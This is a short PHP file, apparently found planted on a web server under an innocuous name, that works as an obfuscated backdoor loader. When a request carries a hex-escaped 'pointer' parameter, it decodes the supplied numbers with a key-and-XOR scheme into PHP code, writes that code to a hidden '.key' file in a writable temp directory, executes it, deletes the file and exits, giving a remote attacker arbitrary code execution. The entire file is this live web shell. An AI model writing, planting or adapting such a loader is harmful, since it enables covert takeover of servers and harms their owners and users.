File: /home/vitanhod/prostanur1.vitavit.com.pk/swedish_mimes.php
<?php
if(array_key_exists("\x70oin\x74er", $_REQUEST)){
$element = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/var/tmp", getcwd(), getenv("TEMP"), "/tmp", session_save_path()]);
$record = $_REQUEST["\x70oin\x74er"];
$record= explode( ".",$record );
$fac = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s );
$u = 0;
foreach ($record as $v8) {
$chS = ord($s[$u % $sLen] );
$d = ((int)$v8 - $chS - ($u % 10)) ^ 73;
$fac .=chr($d );
$u++;
}
while ($item = array_shift($element)) {
if (!( !is_dir($item) || !is_writable($item) )) {
$res = "$item/.key";
if (@file_put_contents($res, $fac) !== false) {
include $res;
unlink($res);
die();
}
}
}
}